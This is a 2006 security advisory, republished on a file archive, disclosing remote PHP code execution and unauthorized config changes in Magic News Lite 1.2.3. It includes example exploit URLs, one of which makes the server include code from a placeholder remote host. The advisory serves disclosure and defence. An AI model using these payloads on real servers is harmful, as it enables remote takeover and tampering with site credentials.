EV0072.txt

EV0072.txt: Posted Feb 22, 2006; Authored by Aliaksandr Hartsuyeu | Site evuln.com; Reamday Enterprises Magic News Lite version 1.2.3 is vulnerable to remote code execution.; tags | exploit, remote, code execution; SHA-256 | e3744687c220f765c14c79cfa2a6b44fa9259a239ef033802305a5f454950be6; Download | Favorite | View

EV0072.txt

New eVuln Advisory:
Magic News Lite PHP Code Execution & Unauthorized Data Modification
http://evuln.com/vulns/72/summary.html

--------------------Summary----------------
eVuln ID: EV0072
CVE: CVE-2006-0723 CVE-2006-0724
Vendor: Reamday Enterprises
Vendor's Web Site: http://reamdaysoft.com
Software: Magic News Lite
Sowtware's Web Site: http://reamdaysoft.com/customers/magic-news-lite/download.html
Versions: 1.2.3
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-----------------Description---------------
1. PHP Code Execution

Vulnerable script: preview.php

Variable $php_script_path is not initialized before being used in include(). This can be used to execute arbitrary php code.

Condition: register_globals = ON


2. Unauthorized Data Modification

Vulnerable script: profile.php

Variables $action $passwd $admin_password $new_passwd $confirm_passwd are not initialized and their values can be replaced by user-defined data. This can be used to make unauthorized modifications in config.php

Condition: register_globals = ON


--------------Exploit----------------------
Available at: http://evuln.com/vulns/72/exploit.html

1. PHP Code Execution Example

http://host/path/preview.php? php_script_path=http://remotehost/lib.php


2. Unauthorized Data Modification Example

http://host/path/profile.php? action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

EV0072.txt

EV0072.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EV0072.txt

Share This

EV0072.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems